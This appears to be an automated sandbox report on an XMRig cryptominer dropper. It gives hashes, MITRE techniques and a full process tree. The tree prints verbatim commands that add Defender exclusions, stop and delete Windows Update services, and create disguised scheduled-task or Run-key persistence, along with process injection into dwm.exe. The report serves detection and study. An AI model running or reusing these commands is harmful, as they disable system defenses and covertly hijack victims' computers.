xmrig | 2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d

General

Target

2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe
Size

4.0MB
MD5

41382215636e83ce55d622ce7f15733a
SHA1

aff94de054bb404000c010c4713998ddc6905626
SHA256

2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d
SHA512

94216303bf4455bc2a8de631c453bef013c1fab36f28c167c3488730d430713f0f117561bff3137697732b3bf16cab74b772fad79a36fc7c06e5be6fbaafe98d
SSDEEP

98304:jgFNGMRUCTguDUdjIF1qZHEfgg1AE1AQamhsDUoYX4:jYN7bThDUdj+qxEYGAE1AQuR

Score

10^/10

xmrig evasion miner upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp	xmrig
behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

3388 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3388	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp	upx
behavioral1/memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp	upx

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 3388 set thread context of 4432	3388	updater.exe	conhost.exe
PID 3388 set thread context of 1892	3388	updater.exe	dwm.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4308 sc.exe
3496 sc.exe
808 sc.exe
4324 sc.exe
1520 sc.exe
4804 sc.exe
852 sc.exe
1340 sc.exe
1084 sc.exe
5004 sc.exe

pid	process
4308	sc.exe
3496	sc.exe
808	sc.exe
4324	sc.exe
1520	sc.exe
4804	sc.exe
852	sc.exe
1340	sc.exe
1084	sc.exe
5004	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedwm.exe

pid	process
2424	powershell.exe
2424	powershell.exe
2424	powershell.exe
3644	powershell.exe
3644	powershell.exe
3644	powershell.exe
3544	powershell.exe
3544	powershell.exe
3544	powershell.exe
356	powershell.exe
356	powershell.exe
356	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe
1892	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

624

pid	process
624

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeIncreaseQuotaPrivilege	2424	powershell.exe
Token: SeSecurityPrivilege	2424	powershell.exe
Token: SeTakeOwnershipPrivilege	2424	powershell.exe
Token: SeLoadDriverPrivilege	2424	powershell.exe
Token: SeSystemProfilePrivilege	2424	powershell.exe
Token: SeSystemtimePrivilege	2424	powershell.exe
Token: SeProfSingleProcessPrivilege	2424	powershell.exe
Token: SeIncBasePriorityPrivilege	2424	powershell.exe
Token: SeCreatePagefilePrivilege	2424	powershell.exe
Token: SeBackupPrivilege	2424	powershell.exe
Token: SeRestorePrivilege	2424	powershell.exe
Token: SeShutdownPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeSystemEnvironmentPrivilege	2424	powershell.exe
Token: SeRemoteShutdownPrivilege	2424	powershell.exe
Token: SeUndockPrivilege	2424	powershell.exe
Token: SeManageVolumePrivilege	2424	powershell.exe
Token: 33	2424	powershell.exe
Token: 34	2424	powershell.exe
Token: 35	2424	powershell.exe
Token: 36	2424	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe
Token: 34	3644	powershell.exe
Token: 35	3644	powershell.exe
Token: 36	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe
Token: 34	3644	powershell.exe
Token: 35	3644	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.execmd.exepowershell.exeupdater.execmd.execonhost.execmd.exe

description	pid	process	target process
PID 4876 wrote to memory of 2424	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 4876 wrote to memory of 2424	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 4876 wrote to memory of 3696	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	cmd.exe
PID 4876 wrote to memory of 3696	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	cmd.exe
PID 4876 wrote to memory of 3644	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 4876 wrote to memory of 3644	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 3696 wrote to memory of 4324	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 4324	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 1084	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 1084	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 1520	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 1520	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 4308	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 4308	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 5004	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 5004	3696	cmd.exe	sc.exe
PID 3696 wrote to memory of 4196	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 4196	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1160	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1160	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 4508	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 4508	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1684	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1684	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1852	3696	cmd.exe	reg.exe
PID 3696 wrote to memory of 1852	3696	cmd.exe	reg.exe
PID 4876 wrote to memory of 3544	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 4876 wrote to memory of 3544	4876	2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe	powershell.exe
PID 3544 wrote to memory of 4128	3544	powershell.exe	schtasks.exe
PID 3544 wrote to memory of 4128	3544	powershell.exe	schtasks.exe
PID 3388 wrote to memory of 356	3388	updater.exe	powershell.exe
PID 3388 wrote to memory of 356	3388	updater.exe	powershell.exe
PID 3388 wrote to memory of 4652	3388	updater.exe	cmd.exe
PID 3388 wrote to memory of 4652	3388	updater.exe	cmd.exe
PID 3388 wrote to memory of 4688	3388	updater.exe	powershell.exe
PID 3388 wrote to memory of 4688	3388	updater.exe	powershell.exe
PID 4652 wrote to memory of 3496	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 3496	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 4804	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 4804	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 852	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 852	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 1340	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 1340	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 808	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 808	4652	cmd.exe	sc.exe
PID 4652 wrote to memory of 192	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 192	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 164	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 164	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 3232	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 3232	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 3988	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 3988	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 4356	4652	cmd.exe	reg.exe
PID 4652 wrote to memory of 4356	4652	cmd.exe	reg.exe
PID 3388 wrote to memory of 4432	3388	updater.exe	conhost.exe
PID 3388 wrote to memory of 4432	3388	updater.exe	conhost.exe
PID 3388 wrote to memory of 4432	3388	updater.exe	conhost.exe
PID 3388 wrote to memory of 4612	3388	updater.exe	cmd.exe
PID 3388 wrote to memory of 4612	3388	updater.exe	cmd.exe
PID 4432 wrote to memory of 1192	4432	conhost.exe	cmd.exe
PID 4432 wrote to memory of 1192	4432	conhost.exe	cmd.exe
PID 4612 wrote to memory of 1008	4612	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe
"C:\Users\Admin\AppData\Local\Temp\2d149bca64703b7cf996a772ba91423da1e1f11dbae522f3e4d3b34095d3b89d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4324

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1084

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1520

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4308

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5004

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4196

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1160

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:4508

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1684

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#zfalrzu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3544

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:4128

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:356

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3496

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:4804

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:852

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1340

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:808

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:192

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:164

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3232

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3988

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#drbpb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4688

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe llktminrzivp
2⤵
- Suspicious use of WriteProcessMemory
PID:4432

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
3⤵
PID:1192

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
2⤵
- Suspicious use of WriteProcessMemory
PID:4612

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
PID:1008

C:\Windows\system32\dwm.exe
C:\Windows\system32\dwm.exe qtbgcbbuyarrseoa 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9abHIdInko1dNj2btVqFpVDPxbdEbNaQGAVINOHgf8WWal3b6c2wr6mRVWR/3OEXgmNHc0PdsvyYK2oX+Nd+NLu2R15GYAs/dQrH+CfI88Ko8ilwYx+F3flcrT35XvHxF1c
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

2

T1031

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Impair Defenses

1

T1562

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

1

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
65c8499b7e69d7dd364815dbae2b6989

SHA1
23df5d601dbd83f5a6f686f952448b0cc21d3b92

SHA256
599dd04a954cb0a826224cf627d38d0bea8ee3d0896d0733ee731e114197d73e

SHA512
1695633aafa095c510fb19895c6d28bf12ea597b873751e68a0a2364c34cce2322631945047e639fd1f165c60fd4e1f1fcf39acd4b714b7d25d50381f7e6ffdf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3fd2e7427285bcbc00dcc0dc49b40196

SHA1
d6e56706c26665d2be693ab870898d340beb4bdd

SHA256
2d861694a1ec8b3863a81ba0df740390eb7d01835e4ca4eee367aba797891956

SHA512
78048f1543f538d0acc6777de939207ae30cea312e551bf86ccfd31779c92194a7774b0f342ff2d95e0876169755f008d08fdf76f2fb2e4ecab73564c1e7a3b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
99f3c4e76ac63484d214fb91349644e8

SHA1
f065388679a20bd59e75166ba9174b8fe8c510bf

SHA256
a01e65c4ee2ce09215f4e35db060152f1ab5f21ce84cfa954118cc724bfe4e9c

SHA512
c9a0a4b5c13d381875485316ce56f56839dd76bc53fd574139830817252ad0e1ffcdf64f408d1942a3c95541181d07c15ecff9f20b5f0de3890490de0f530e67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b048bf8754fa7e5cec67d8cd464c8bf9

SHA1
511440b7c0eba55472dad88c574a367ce4907456

SHA256
5d1954206c50f6f1107b7622dbc812e2f7de31a4fe7ef6a0985505701bd9f9b3

SHA512
3fc4dc6bc9037508ee3f85a1c471114133a7984c78d75214add56f2dec47996abc2f9a1bd93f0b120760932e1a99d5450204e44490bc23f254e30a0641086c72

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
Filesize
4.0MB

MD5
c5eccb1c34f5b5280b63739c2c0c09e8

SHA1
e2005f576140f66759cb8a68c4aec4f94e61b94b

SHA256
9853e0d5a9fdc25ab4021d8dfbe7f0ba1bfbfd6f19e4e3ea96b9cce93026760c

SHA512
71d1d82077aec3b924b4f3d4def6d0fc184c4c8586d76f3f41f917e742b5398c134631175ca4f243db538b6c8fe8daf19c23e02736cbef71d5ec61a78fc6a4dd

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
memory/164-288-0x0000000000000000-mapping.dmp

Download
memory/192-285-0x0000000000000000-mapping.dmp

Download
memory/356-226-0x0000000000000000-mapping.dmp

Download
memory/808-276-0x0000000000000000-mapping.dmp

Download
memory/852-273-0x0000000000000000-mapping.dmp

Download
memory/1008-315-0x0000000000000000-mapping.dmp

Download
memory/1084-166-0x0000000000000000-mapping.dmp

Download
memory/1160-179-0x0000000000000000-mapping.dmp

Download
memory/1192-314-0x0000000000000000-mapping.dmp

Download
memory/1340-274-0x0000000000000000-mapping.dmp

Download
memory/1520-169-0x0000000000000000-mapping.dmp

Download
memory/1684-185-0x0000000000000000-mapping.dmp

Download
memory/1852-188-0x0000000000000000-mapping.dmp

Download
memory/1892-328-0x0000016C44700000-0x0000016C44720000-memory.dmp

Filesize
128KB

Download
memory/1892-323-0x0000016BB19E0000-0x0000016BB1A00000-memory.dmp

Filesize
128KB

Download
memory/1892-319-0x0000016BB0010000-0x0000016BB0030000-memory.dmp

Filesize
128KB

Download
memory/1892-318-0x00007FF7A8A325D0-mapping.dmp

Download
memory/1892-324-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp

Filesize
8.0MB

Download
memory/1892-320-0x00007FF7A8240000-0x00007FF7A8A34000-memory.dmp

Filesize
8.0MB

Download
memory/1892-330-0x0000016C44700000-0x0000016C44720000-memory.dmp

Filesize
128KB

Download
memory/1892-325-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp

Filesize
128KB

Download
memory/1892-326-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp

Filesize
128KB

Download
memory/1892-329-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp

Filesize
128KB

Download
memory/1892-327-0x0000016BB1A20000-0x0000016BB1A40000-memory.dmp

Filesize
128KB

Download
memory/2424-131-0x000001F39EE00000-0x000001F39EE76000-memory.dmp

Filesize
472KB

Download
memory/2424-126-0x000001F39EC50000-0x000001F39EC72000-memory.dmp

Filesize
136KB

Download
memory/2424-120-0x0000000000000000-mapping.dmp

Download
memory/3232-289-0x0000000000000000-mapping.dmp

Download
memory/3496-267-0x0000000000000000-mapping.dmp

Download
memory/3544-206-0x0000000000000000-mapping.dmp

Download
memory/3644-160-0x0000000000000000-mapping.dmp

Download
memory/3696-159-0x0000000000000000-mapping.dmp

Download
memory/3988-306-0x0000000000000000-mapping.dmp

Download
memory/4128-223-0x0000000000000000-mapping.dmp

Download
memory/4196-176-0x0000000000000000-mapping.dmp

Download
memory/4308-172-0x0000000000000000-mapping.dmp

Download
memory/4324-161-0x0000000000000000-mapping.dmp

Download
memory/4356-307-0x0000000000000000-mapping.dmp

Download
memory/4432-309-0x00007FF7B55914E0-mapping.dmp

Download
memory/4508-184-0x0000000000000000-mapping.dmp

Download
memory/4612-312-0x0000000000000000-mapping.dmp

Download
memory/4652-264-0x0000000000000000-mapping.dmp

Download
memory/4688-265-0x0000000000000000-mapping.dmp

Download
